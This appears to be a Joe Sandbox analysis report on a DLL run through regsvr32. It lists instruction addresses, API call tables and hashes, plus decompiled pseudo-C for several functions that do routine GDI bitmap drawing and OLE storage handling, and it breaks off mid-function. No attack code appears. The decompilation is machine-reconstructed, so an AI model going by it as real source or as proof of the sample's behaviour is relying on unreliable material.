                                                                                                                0x1002e5a1
                                                                                                                0x1002e5a4
                                                                                                                0x1002e5a7
                                                                                                                0x1002e5a7
                                                                                                                0x00000000
                                                                                                                0x1002e595
                                                                                                                0x1002e443
                                                                                                                0x1002e445
                                                                                                                0x1002e49f
                                                                                                                0x1002e4a2
                                                                                                                0x1002e554
                                                                                                                0x1002e55b
                                                                                                                0x1002e55b
                                                                                                                0x1002e55e
                                                                                                                0x1002e561
                                                                                                                0x1002e564
                                                                                                                0x1002e567
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002e56c
                                                                                                                0x1002e56e
                                                                                                                0x1002e578
                                                                                                                0x1002e57a
                                                                                                                0x1002e589
                                                                                                                0x1002e589
                                                                                                                0x1002e578
                                                                                                                0x00000000
                                                                                                                0x1002e56c
                                                                                                                0x1002e4ac
                                                                                                                0x1002e4af
                                                                                                                0x1002e4b1
                                                                                                                0x1002e4b4
                                                                                                                0x1002e4ed
                                                                                                                0x1002e4ed
                                                                                                                0x1002e4f4
                                                                                                                0x1002e4f7
                                                                                                                0x1002e4f7
                                                                                                                0x1002e4fa
                                                                                                                0x1002e4fd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002e4ff
                                                                                                                0x1002e508
                                                                                                                0x1002e50e
                                                                                                                0x1002e510
                                                                                                                0x1002e513
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002e515
                                                                                                                0x1002e521
                                                                                                                0x1002e524
                                                                                                                0x1002e52a
                                                                                                                0x1002e52c
                                                                                                                0x1002e52f
                                                                                                                0x1002e531
                                                                                                                0x1002e53d
                                                                                                                0x1002e540
                                                                                                                0x1002e546
                                                                                                                0x1002e546
                                                                                                                0x1002e549
                                                                                                                0x1002e54c
                                                                                                                0x1002e54f
                                                                                                                0x00000000
                                                                                                                0x1002e54f
                                                                                                                0x1002e4b6
                                                                                                                0x1002e4bd
                                                                                                                0x1002e4bf
                                                                                                                0x1002e4c5
                                                                                                                0x1002e4c7
                                                                                                                0x1002e4ca
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002e4cd
                                                                                                                0x1002e4d3
                                                                                                                0x1002e4d5
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002e4df
                                                                                                                0x1002e4e5
                                                                                                                0x00000000
                                                                                                                0x1002e4e5
                                                                                                                0x1002e4b8
                                                                                                                0x1002e4bb
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002e4bb
                                                                                                                0x1002e447
                                                                                                                0x1002e44e
                                                                                                                0x1002e451
                                                                                                                0x1002e457
                                                                                                                0x1002e459
                                                                                                                0x1002e45c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002e462
                                                                                                                0x1002e46f
                                                                                                                0x1002e472
                                                                                                                0x1002e478
                                                                                                                0x1002e47a
                                                                                                                0x1002e47d
                                                                                                                0x1002e47f
                                                                                                                0x1002e48b
                                                                                                                0x1002e48e
                                                                                                                0x1002e494
                                                                                                                0x1002e494
                                                                                                                0x1002e497
                                                                                                                0x00000000
                                                                                                                0x1002e497
                                                                                                                0x1002e3c1
                                                                                                                0x1002e3c1
                                                                                                                0x1002e3c5
                                                                                                                0x1002e3cf
                                                                                                                0x1002e3d1
                                                                                                                0x1002e3d3
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002e3d5
                                                                                                                0x1002e3d7
                                                                                                                0x1002e3f3
                                                                                                                0x1002e3ff
                                                                                                                0x1002e402
                                                                                                                0x1002e407
                                                                                                                0x1002e411
                                                                                                                0x1002e414
                                                                                                                0x1002e414
                                                                                                                0x1002e414
                                                                                                                0x1002e41b
                                                                                                                0x1002e41e
                                                                                                                0x1002e3d9
                                                                                                                0x1002e3d9
                                                                                                                0x1002e3e2
                                                                                                                0x1002e3e2
                                                                                                                0x1002e423
                                                                                                                0x00000000
                                                                                                                0x1002e423
                                                                                                                0x1002e35c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002e362
                                                                                                                0x1002e369
                                                                                                                0x1002e36a
                                                                                                                0x1002e36f
                                                                                                                0x1002e374
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002e378
                                                                                                                0x1002e379
                                                                                                                0x1002e37a
                                                                                                                0x1002e37b
                                                                                                                0x1002e384
                                                                                                                0x00000000
                                                                                                                0x1002e386
                                                                                                                0x1002e395
                                                                                                                0x1002e398
                                                                                                                0x1002e39b
                                                                                                                0x1002e3a8
                                                                                                                0x1002e3ab
                                                                                                                0x1002e3b1
                                                                                                                0x1002e3b4
                                                                                                                0x00000000
                                                                                                                0x1002e3b4
                                                                                                                0x1002e384
                                                                                                                0x1002e321
                                                                                                                0x1002e32c
                                                                                                                0x1002e336
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002e338
                                                                                                                0x1002e344
                                                                                                                0x1002e349
                                                                                                                0x1002e34c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1002e34c
                                                                                                                0x1002e2ec
                                                                                                                0x1002e2f3
                                                                                                                0x1002e2f6
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1002E2C7
                                                                                                                  • Part of subcall function 1002C456: SysStringLen.OLEAUT32(?), ref: 1002C45E
                                                                                                                  • Part of subcall function 1002C456: CoGetClassObject.OLE32(?,?,00000000,100A592C,?), ref: 1002C47C
                                                                                                                • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 1002E451
                                                                                                                • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 1002E472
                                                                                                                • GlobalAlloc.KERNEL32(00000000,00000000), ref: 1002E4BF
                                                                                                                • GlobalLock.KERNEL32 ref: 1002E4CD
                                                                                                                • GlobalUnlock.KERNEL32(?), ref: 1002E4E5
                                                                                                                • CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 1002E508
                                                                                                                • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 1002E524
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
                                                                                                                • String ID:
                                                                                                                • API String ID: 317715441-0
                                                                                                                • Opcode ID: 8c7d488902b9e1a39518e68f9d93eed89a4edd8462c3009efc4f67080f8eaa64
                                                                                                                • Instruction ID: 46ea3d0135d633fa669698b565d5f04e2964583978d89af6c37444e9be5ad38e
                                                                                                                • Opcode Fuzzy Hash: 8c7d488902b9e1a39518e68f9d93eed89a4edd8462c3009efc4f67080f8eaa64
                                                                                                                • Instruction Fuzzy Hash: AAC128B094025ADFCB10DFA4D8889AEBBB9FF48344B904969F916EB251D771DD40CB60
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000DDD6 Relevance: 12.2, APIs: 8, Instructions: 202windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 97%
                                                                                                                			E1000DDD6(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t122;
				intOrPtr _t130;
				intOrPtr _t132;
				struct tagRECT _t175;
				intOrPtr _t179;
				intOrPtr* _t181;
				void* _t183;

				_push(0x5c);
				E1004764D(0x1008e18e, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t183 - 0x30)) = 0x1009a2fc;
				 *(_t183 - 0x2c) = 0;
				 *((intOrPtr*)(_t183 - 0x28)) = 0;
				 *((intOrPtr*)(_t183 - 0x24)) = 0;
				 *(_t183 - 4) = 0;
				 *((intOrPtr*)(_t183 - 0x40)) = 0x1009a2fc;
				 *(_t183 - 0x3c) = 0;
				 *((intOrPtr*)(_t183 - 0x38)) = 0;
				 *((intOrPtr*)(_t183 - 0x34)) = 0;
				 *((intOrPtr*)(_t183 - 0x14)) = 0;
				 *((intOrPtr*)(_t183 - 0x18)) = 0x10098d24;
				 *(_t183 - 0x1c) = 0;
				 *((intOrPtr*)(_t183 - 0x20)) = 0x1009831c;
				_t181 =  *((intOrPtr*)(_t183 + 8));
				 *(_t183 - 4) = 3;
				if(E1000D064(_t183 - 0x30, _t181) != 0 && E1000D064(_t183 - 0x40, _t181) != 0 && GetObjectA( *( *((intOrPtr*)(_t183 + 0x14)) + 4), 0x18, _t183 - 0x68) != 0) {
					L1000CFA3(_t183 - 0x18, CreateBitmap, _t183, CreateBitmap(8, 8, 1, 1, 0x1009a514));
					E1000D03E(_t183 - 0x20, _t183 - 0x18);
					L1000CFF6(_t183 - 0x18);
					L1000CFA3(_t183 - 0x18, CreateBitmap, _t183, CreateBitmap( *(_t183 - 0x64),  *(_t183 - 0x60), 1, 1, 0));
					 *((intOrPtr*)(_t183 + 0x14)) = E1000D0A1( *(_t183 - 0x2c),  *( *((intOrPtr*)(_t183 + 0x14)) + 4));
					_t122 = E1000D0A1( *(_t183 - 0x3c),  *((intOrPtr*)(_t183 - 0x14)));
					 *((intOrPtr*)(_t183 - 0x10)) = _t122;
					if( *((intOrPtr*)(_t183 + 0x14)) != 0 && _t122 != 0) {
						 *((intOrPtr*)(_t183 + 8)) = E1000BD03(GetPixel( *(_t183 - 0x2c), 0, 0), _t183 - 0x30, _t123);
						E1000BD03(BitBlt( *(_t183 - 0x3c), 0, 0,  *(_t183 - 0x64),  *(_t183 - 0x60),  *(_t183 - 0x2c), 0, 0, 0xcc0020), _t183 - 0x30, 0xffffff);
						E1000BD03(BitBlt( *(_t183 - 0x3c), 0, 0,  *(_t183 - 0x64),  *(_t183 - 0x60),  *(_t183 - 0x2c), 0, 0, 0xee0086), _t183 - 0x30,  *((intOrPtr*)(_t183 + 8)));
						_t130 =  *((intOrPtr*)( *_t181 + 0x30))( *((intOrPtr*)(_t183 + 0x18)));
						 *((intOrPtr*)(_t183 + 0x18)) = _t130;
						_t132 =  *((intOrPtr*)( *_t181 + 0x2c))( *((intOrPtr*)(_t183 + 0x1c)));
						_t179 =  *((intOrPtr*)(_t183 + 0x10));
						_t175 =  *(_t183 + 0xc);
						 *((intOrPtr*)(_t183 + 0x1c)) = _t132;
						 *((intOrPtr*)(_t183 - 0x44)) =  *(_t183 - 0x60) + _t179;
						 *(_t183 - 0x50) = _t175;
						 *((intOrPtr*)(_t183 - 0x4c)) = _t179;
						 *((intOrPtr*)(_t183 - 0x48)) =  *(_t183 - 0x64) + _t175;
						FillRect( *(_t181 + 4), _t183 - 0x50,  *(_t183 - 0x1c));
						 *((intOrPtr*)( *_t181 + 0x30))( *((intOrPtr*)(_t183 + 0x18)));
						 *((intOrPtr*)( *_t181 + 0x2c))( *((intOrPtr*)(_t183 + 0x1c)));
						E1000C436(_t181,  *(_t183 + 0xc), _t179,  *(_t183 - 0x64),  *(_t183 - 0x60), _t183 - 0x30, 0, 0, 0x660046);
						E1000C436(_t181,  *(_t183 + 0xc), _t179,  *(_t183 - 0x64),  *(_t183 - 0x60), _t183 - 0x40, 0, 0, 0x8800c6);
						E1000C436(_t181,  *(_t183 + 0xc), _t179,  *(_t183 - 0x64),  *(_t183 - 0x60), _t183 - 0x30, 0, 0, 0x660046);
						E1000D0A1( *(_t183 - 0x3c),  *((intOrPtr*)( *((intOrPtr*)(_t183 - 0x10)) + 4)));
						E1000D0A1( *(_t183 - 0x2c),  *( *((intOrPtr*)(_t183 + 0x14)) + 4));
					}
				}
				 *(_t183 - 4) = 2;
				 *((intOrPtr*)(_t183 - 0x20)) = 0x10098308;
				L1000CFF6(_t183 - 0x20);
				 *(_t183 - 4) = 1;
				 *((intOrPtr*)(_t183 - 0x18)) = 0x10098308;
				L1000CFF6(_t183 - 0x18);
				 *(_t183 - 4) = 0;
				L1000CD56(_t183 - 0x40);
				 *(_t183 - 4) =  *(_t183 - 4) | 0xffffffff;
				return E10047725(L1000CD56(_t183 - 0x30));
			}










                                                                                                                0x1000ddd6
                                                                                                                0x1000dddd
                                                                                                                0x1000dde9
                                                                                                                0x1000ddec
                                                                                                                0x1000ddef
                                                                                                                0x1000ddf2
                                                                                                                0x1000ddf5
                                                                                                                0x1000ddf8
                                                                                                                0x1000ddfb
                                                                                                                0x1000ddfe
                                                                                                                0x1000de01
                                                                                                                0x1000de04
                                                                                                                0x1000de07
                                                                                                                0x1000de0e
                                                                                                                0x1000de11
                                                                                                                0x1000de18
                                                                                                                0x1000de1f
                                                                                                                0x1000de2a
                                                                                                                0x1000de74
                                                                                                                0x1000de80
                                                                                                                0x1000de88
                                                                                                                0x1000de9e
                                                                                                                0x1000deb4
                                                                                                                0x1000deba
                                                                                                                0x1000dec2
                                                                                                                0x1000dec5
                                                                                                                0x1000def7
                                                                                                                0x1000df0f
                                                                                                                0x1000df31
                                                                                                                0x1000df3d
                                                                                                                0x1000df43
                                                                                                                0x1000df4a
                                                                                                                0x1000df4d
                                                                                                                0x1000df53
                                                                                                                0x1000df59
                                                                                                                0x1000df61
                                                                                                                0x1000df6d
                                                                                                                0x1000df70
                                                                                                                0x1000df73
                                                                                                                0x1000df76
                                                                                                                0x1000df83
                                                                                                                0x1000df8d
                                                                                                                0x1000dfa7
                                                                                                                0x1000dfc3
                                                                                                                0x1000dfdf
                                                                                                                0x1000dfed
                                                                                                                0x1000dffb
                                                                                                                0x1000dffb
                                                                                                                0x1000dec5
                                                                                                                0x1000e008
                                                                                                                0x1000e00c
                                                                                                                0x1000e00f
                                                                                                                0x1000e017
                                                                                                                0x1000e01b
                                                                                                                0x1000e01e
                                                                                                                0x1000e026
                                                                                                                0x1000e029
                                                                                                                0x1000e02e
                                                                                                                0x1000e03f

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1000DDDD
                                                                                                                  • Part of subcall function 1000D064: CreateCompatibleDC.GDI32(?), ref: 1000D073
                                                                                                                • GetObjectA.GDI32(00000003,00000018,?), ref: 1000DE4D
                                                                                                                • CreateBitmap.GDI32(00000008,00000008,00000001,00000001,1009A514), ref: 1000DE6E
                                                                                                                  • Part of subcall function 1000D03E: CreatePatternBrush.GDI32(?), ref: 1000D04D
                                                                                                                • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 1000DE98
                                                                                                                  • Part of subcall function 1000D0A1: SelectObject.GDI32(?,?), ref: 1000D0A9
                                                                                                                • GetPixel.GDI32(?,00000000,00000000), ref: 1000DED8
                                                                                                                  • Part of subcall function 1000BD03: SetBkColor.GDI32(?,?), ref: 1000BD1D
                                                                                                                  • Part of subcall function 1000BD03: SetBkColor.GDI32(?,?), ref: 1000BD2B
                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 1000DF05
                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00EE0086), ref: 1000DF29
                                                                                                                • FillRect.USER32(00000003,?,?), ref: 1000DF76
                                                                                                                  • Part of subcall function 1000C436: BitBlt.GDI32(?,?,?,?,?,?,?,?,?), ref: 1000C45C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Create$BitmapColorObject$BrushCompatibleFillH_prolog3PatternPixelRectSelect
                                                                                                                • String ID:
                                                                                                                • API String ID: 1458925443-0
                                                                                                                • Opcode ID: 2049ac294c08e55e4a21875b776fc7ee10fcff62426293ab6dfae7e52ea0fcb5
                                                                                                                • Instruction ID: 77c58d3e43a35b987cd2dffd8b8a9243759cfaf0f7ba19e0065bb487ce2970d6
                                                                                                                • Opcode Fuzzy Hash: 2049ac294c08e55e4a21875b776fc7ee10fcff62426293ab6dfae7e52ea0fcb5
                                                                                                                • Instruction Fuzzy Hash: 3281D175900219AFEF11DF94CD85EEEBBBAFF08340F108029F509A6261DB71AA11DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1000D8C3 Relevance: 12.2, APIs: 8, Instructions: 183windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E1000D8C3(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t101;
				intOrPtr _t102;
				intOrPtr* _t157;
				void* _t159;
				void* _t160;

				_t160 = __eflags;
				_push(0x54);
				E1004764D(0x1008e110, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t159 - 0x48)) = 0x1009a2fc;
				 *(_t159 - 0x44) = 0;
				 *((intOrPtr*)(_t159 - 0x40)) = 0;
				 *((intOrPtr*)(_t159 - 0x3c)) = 0;
				 *(_t159 - 4) = 0;
				 *((intOrPtr*)(_t159 - 0x38)) = 0x1009a2fc;
				 *(_t159 - 0x34) = 0;
				 *((intOrPtr*)(_t159 - 0x30)) = 0;
				 *((intOrPtr*)(_t159 - 0x2c)) = 0;
				 *((intOrPtr*)(_t159 - 0x14)) = 0;
				 *((intOrPtr*)(_t159 - 0x18)) = 0x10098d24;
				 *(_t159 - 4) = 2;
				_push(GetSysColor(0x14));
				E1000D544(0, _t159 - 0x28, __edi, GetSysColor, _t160);
				 *(_t159 - 4) = 3;
				_push(GetSysColor(0x10));
				E1000D544(0, _t159 - 0x20, __edi, GetSysColor, _t160);
				_t157 =  *((intOrPtr*)(_t159 + 8));
				 *(_t159 - 4) = 4;
				if(E1000D064(_t159 - 0x48, _t157) != 0 && E1000D064(_t159 - 0x38, _t157) != 0) {
					_t151 =  *((intOrPtr*)(_t159 + 0x14));
					if(GetObjectA( *( *((intOrPtr*)(_t159 + 0x14)) + 4), 0x18, _t159 - 0x60) != 0 && L1000CFA3(_t159 - 0x18, _t151, _t159, CreateBitmap( *(_t159 - 0x5c),  *(_t159 - 0x58), 1, 1, 0)) != 0) {
						_t101 = E1000D0A1( *(_t159 - 0x44),  *((intOrPtr*)(_t151 + 4)));
						_t102 = E1000D0A1( *(_t159 - 0x34),  *((intOrPtr*)(_t159 - 0x14)));
						 *((intOrPtr*)(_t159 - 0x10)) = _t102;
						if(_t101 != 0 && _t102 != 0) {
							 *((intOrPtr*)(_t159 + 0x14)) = E1000BD03(GetPixel( *(_t159 - 0x44), 0, 0), _t159 - 0x48, _t103);
							E1000BD03(BitBlt( *(_t159 - 0x34), 0, 0,  *(_t159 - 0x5c),  *(_t159 - 0x58),  *(_t159 - 0x44), 0, 0, 0xcc0020), _t159 - 0x48, 0xffffff);
							BitBlt( *(_t159 - 0x34), 0, 0,  *(_t159 - 0x5c),  *(_t159 - 0x58),  *(_t159 - 0x44), 0, 0, 0x1100a6);
							E10020117(_t157,  *((intOrPtr*)(_t159 + 0xc)),  *((intOrPtr*)(_t159 + 0x10)),  *(_t159 - 0x5c),  *(_t159 - 0x58),  *((intOrPtr*)(_t159 + 0x18)));
							 *((intOrPtr*)( *_t157 + 0x2c))(0xffffff);
							 *((intOrPtr*)(_t159 + 8)) = E1000D13A(_t157, _t159 - 0x28);
							E1000C436(_t157,  *((intOrPtr*)(_t159 + 0xc)) + 1,  *((intOrPtr*)(_t159 + 0x10)) + 1,  *(_t159 - 0x5c),  *(_t159 - 0x58), _t159 - 0x38, 0, 0, 0xe20746);
							E1000D13A(_t157, _t159 - 0x20);
							E1000C436(_t157,  *((intOrPtr*)(_t159 + 0xc)),  *((intOrPtr*)(_t159 + 0x10)),  *(_t159 - 0x5c),  *(_t159 - 0x58), _t159 - 0x38, 0, 0, 0xe20746);
							E1000D13A(_t157,  *((intOrPtr*)(_t159 + 8)));
							 *((intOrPtr*)( *_t157 + 0x2c))( *((intOrPtr*)(_t159 + 0x14)));
							E1000D0A1( *(_t159 - 0x34),  *((intOrPtr*)( *((intOrPtr*)(_t159 - 0x10)) + 4)));
						}
					}
				}
				 *(_t159 - 4) = 3;
				 *((intOrPtr*)(_t159 - 0x20)) = 0x10098308;
				L1000CFF6(_t159 - 0x20);
				 *(_t159 - 4) = 2;
				 *((intOrPtr*)(_t159 - 0x28)) = 0x10098308;
				L1000CFF6(_t159 - 0x28);
				 *(_t159 - 4) = 1;
				 *((intOrPtr*)(_t159 - 0x18)) = 0x10098308;
				L1000CFF6(_t159 - 0x18);
				 *(_t159 - 4) = 0;
				L1000CD56(_t159 - 0x38);
				 *(_t159 - 4) =  *(_t159 - 4) | 0xffffffff;
				return E10047725(L1000CD56(_t159 - 0x48));
			}








                                                                                                                0x1000d8c3
                                                                                                                0x1000d8c3
                                                                                                                0x1000d8ca
                                                                                                                0x1000d8d6
                                                                                                                0x1000d8d9
                                                                                                                0x1000d8dc
                                                                                                                0x1000d8df
                                                                                                                0x1000d8e2
                                                                                                                0x1000d8e5
                                                                                                                0x1000d8e8
                                                                                                                0x1000d8eb
                                                                                                                0x1000d8ee
                                                                                                                0x1000d8f1
                                                                                                                0x1000d8f4
                                                                                                                0x1000d903
                                                                                                                0x1000d909
                                                                                                                0x1000d90d
                                                                                                                0x1000d914
                                                                                                                0x1000d91a
                                                                                                                0x1000d91e
                                                                                                                0x1000d923
                                                                                                                0x1000d92a
                                                                                                                0x1000d935
                                                                                                                0x1000d94c
                                                                                                                0x1000d960
                                                                                                                0x1000d98e
                                                                                                                0x1000d99b
                                                                                                                0x1000d9a2
                                                                                                                0x1000d9a5
                                                                                                                0x1000d9d7
                                                                                                                0x1000d9ef
                                                                                                                0x1000da09
                                                                                                                0x1000da1c
                                                                                                                0x1000da2a
                                                                                                                0x1000da38
                                                                                                                0x1000da59
                                                                                                                0x1000da64
                                                                                                                0x1000da7e
                                                                                                                0x1000da88
                                                                                                                0x1000da94
                                                                                                                0x1000daa0
                                                                                                                0x1000daa0
                                                                                                                0x1000d9a5
                                                                                                                0x1000d960
                                                                                                                0x1000daad
                                                                                                                0x1000dab1
                                                                                                                0x1000dab4
                                                                                                                0x1000dabc
                                                                                                                0x1000dac0
                                                                                                                0x1000dac3
                                                                                                                0x1000dacb
                                                                                                                0x1000dacf
                                                                                                                0x1000dad2
                                                                                                                0x1000dada
                                                                                                                0x1000dadd
                                                                                                                0x1000dae2
                                                                                                                0x1000daf3

                                                                                                                APIs
                                                                                                                • __EH_prolog3.LIBCMT ref: 1000D8CA
                                                                                                                • GetSysColor.USER32 ref: 1000D907
                                                                                                                  • Part of subcall function 1000D544: __EH_prolog3.LIBCMT ref: 1000D54B
                                                                                                                  • Part of subcall function 1000D544: CreateSolidBrush.GDI32(00000000), ref: 1000D566
                                                                                                                • GetSysColor.USER32 ref: 1000D918
                                                                                                                  • Part of subcall function 1000D064: CreateCompatibleDC.GDI32(?), ref: 1000D073
                                                                                                                • GetObjectA.GDI32(00000004,00000018,?), ref: 1000D958
                                                                                                                • CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 1000D971
                                                                                                                  • Part of subcall function 1000D0A1: SelectObject.GDI32(?,?), ref: 1000D0A9
                                                                                                                • GetPixel.GDI32(?,00000000,00000000), ref: 1000D9B8
                                                                                                                  • Part of subcall function 1000BD03: SetBkColor.GDI32(?,?), ref: 1000BD1D
                                                                                                                  • Part of subcall function 1000BD03: SetBkColor.GDI32(?,?), ref: 1000BD2B
                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 1000D9E5
                                                                                                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,001100A6), ref: 1000DA09
                                                                                                                  • Part of subcall function 10020117: SetBkColor.GDI32(?,?), ref: 10020126
                                                                                                                  • Part of subcall function 10020117: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 10020158
                                                                                                                  • Part of subcall function 1000D13A: SelectObject.GDI32(?,00000000), ref: 1000D15C
                                                                                                                  • Part of subcall function 1000D13A: SelectObject.GDI32(?,00000004), ref: 1000D172
                                                                                                                  • Part of subcall function 1000C436: BitBlt.GDI32(?,?,?,?,?,?,?,?,?), ref: 1000C45C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.442029395.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.442024464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442187115.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442192473.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442199197.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442426454.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442455942.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442523514.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442592062.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442597093.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.442687378.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Color$Object$CreateSelect$H_prolog3$BitmapBrushCompatiblePixelSolidText
                                                                                                                • String ID:
                                                                                                                • API String ID: 2841110477-0
                                                                                                                • Opcode ID: 7ca8c7a22dcc9177c41a1f071a1246e83baa6db38511a8c6ac0d58135de08f41
                                                                                                                • Instruction ID: 9a0a8619dc2d9126584e789a73e267e3b9ea50487815501d297b1d3d9f768c12
                                                                                                                • Opcode Fuzzy Hash: 7ca8c7a22dcc9177c41a1f071a1246e83baa6db38511a8c6ac0d58135de08f41
                                                                                                                • Instruction Fuzzy Hash: FE61147590024DAEEF01EFD4CC81AEEBF7AFF08390F104029F505A62A5DB31AA51DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100143DE Relevance: 12.1, APIs: 8, Instructions: 124windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 92%
                                                                                                                			E100143DE(void* __ecx, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16, struct tagRECT* _a20, signed int _a24, intOrPtr _a28) {
				int _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagRECT _v36;
				void* _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t61;
				int _t62;
				signed int _t64;
				void* _t72;
				intOrPtr* _t85;
				signed int _t87;
				struct HWND__* _t91;
				void* _t92;

				_t72 = __ecx;
				_t75 = _a28;
				_v8 = 0;
				_v12 = _a28;
				_v16 = 0;
				_v20 = 0;
				if(_a24 == 0) {
					GetClientRect( *(__ecx + 0x20),  &_v36);
